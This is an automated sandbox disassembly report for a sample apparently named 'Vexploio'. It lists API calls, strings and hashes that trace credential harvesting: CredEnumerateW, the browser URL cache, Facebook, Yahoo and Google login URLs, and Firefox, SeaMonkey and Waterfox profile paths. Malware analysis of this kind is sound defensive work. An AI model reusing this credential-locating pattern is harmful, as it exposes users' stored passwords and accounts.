                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 823 41837f-4183bf 824 4183c1-4183cc call 418197 823->824 825 4183dc-4183ec call 418160 823->825 830 4183d2-4183d8 824->830 831 418517-41851d 824->831 832 4183f6-41840b 825->832 833 4183ee-4183f1 825->833 830->825 834 418417-418423 832->834 835 41840d-418415 832->835 833->831 836 418427-418442 call 41739b 834->836 835->836 839 418444-41845d CreateFileW 836->839 840 41845f-418475 CreateFileA 836->840 841 418477-41847c 839->841 840->841 842 4184c2-4184c7 841->842 843 41847e-418495 GetLastError ??3@YAXPAX@Z 841->843 846 4184d5-418501 memset call 418758 842->846 847 4184c9-4184d3 842->847 844 4184b5-4184c0 call 444706 843->844 845 418497-4184b3 call 41837f 843->845 844->831 845->831 851 418506-418515 ??3@YAXPAX@Z 846->851 847->846 851->831
                              APIs
                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                              • GetLastError.KERNEL32 ref: 0041847E
                              • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: CreateFile$??3@ErrorLast
                              • String ID: |A
                              • API String ID: 1407640353-1717621600
                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                              • String ID: r!A
                              • API String ID: 2791114272-628097481
                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                              APIs
                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                              • _wcslwr.MSVCRT ref: 0040C817
                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                              • wcslen.MSVCRT ref: 0040C82C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                              • API String ID: 62308376-4196376884
                              • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                              • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                              APIs
                              • memset.MSVCRT ref: 0040A824
                              • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                              • wcscpy.MSVCRT ref: 0040A854
                              • wcscat.MSVCRT ref: 0040A86A
                              • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                              • LoadLibraryW.KERNEL32(?), ref: 0040A884
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                              • String ID: C:\Windows\system32
                              • API String ID: 669240632-2896066436
                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                              APIs
                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                              • wcslen.MSVCRT ref: 0040BE06
                              • _wcsncoll.MSVCRT ref: 0040BE38
                              • memset.MSVCRT ref: 0040BE91
                              • memcpy.MSVCRT ref: 0040BEB2
                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                              • wcschr.MSVCRT ref: 0040BF24
                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                              • String ID:
                              • API String ID: 3191383707-0
                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                              APIs
                              • memset.MSVCRT ref: 00403CBF
                              • memset.MSVCRT ref: 00403CD4
                              • memset.MSVCRT ref: 00403CE9
                              • memset.MSVCRT ref: 00403CFE
                              • memset.MSVCRT ref: 00403D13
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                              • memset.MSVCRT ref: 00403DDA
                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                              • String ID: Waterfox$Waterfox\Profiles
                              • API String ID: 4039892925-11920434
                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                              APIs
                              • memset.MSVCRT ref: 00403E50
                              • memset.MSVCRT ref: 00403E65
                              • memset.MSVCRT ref: 00403E7A
                              • memset.MSVCRT ref: 00403E8F
                              • memset.MSVCRT ref: 00403EA4
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                              • memset.MSVCRT ref: 00403F6B
                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                              • API String ID: 4039892925-2068335096
                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                              APIs
                              • memset.MSVCRT ref: 00403FE1
                              • memset.MSVCRT ref: 00403FF6
                              • memset.MSVCRT ref: 0040400B
                              • memset.MSVCRT ref: 00404020
                              • memset.MSVCRT ref: 00404035
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                              • memset.MSVCRT ref: 004040FC
                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                              • API String ID: 4039892925-3369679110
                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                              • API String ID: 3510742995-2641926074
                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                              APIs
                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                              • memset.MSVCRT ref: 004033B7
                              • memcpy.MSVCRT ref: 004033D0
                              • wcscmp.MSVCRT ref: 004033FC
                              • _wcsicmp.MSVCRT ref: 00403439
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                              • String ID: $0.@
                              • API String ID: 3030842498-1896041820
                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                              APIs
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                              • String ID:
                              • API String ID: 2941347001-0
                              • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                              • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                              APIs
                              • memset.MSVCRT ref: 00403C09
                              • memset.MSVCRT ref: 00403C1E
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                              • wcscat.MSVCRT ref: 00403C47
                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • wcscat.MSVCRT ref: 00403C70
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                              • API String ID: 1534475566-1174173950
                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                              APIs
                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • memset.MSVCRT ref: 00414C87
                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • wcscpy.MSVCRT ref: 00414CFC
                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                              • API String ID: 71295984-2036018995
                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                              APIs
                              • wcschr.MSVCRT ref: 00414458
                              • _snwprintf.MSVCRT ref: 0041447D
                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                              • String ID: "%s"
                              • API String ID: 1343145685-3297466227
                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcProcessTimes
                              • String ID: GetProcessTimes$kernel32.dll
                              • API String ID: 1714573020-3385500049
                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                              APIs
                              • memset.MSVCRT ref: 004087D6
                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                              • memset.MSVCRT ref: 00408828
                              • memset.MSVCRT ref: 00408840
                              • memset.MSVCRT ref: 00408858
                              • memset.MSVCRT ref: 00408870
                              • memset.MSVCRT ref: 00408888
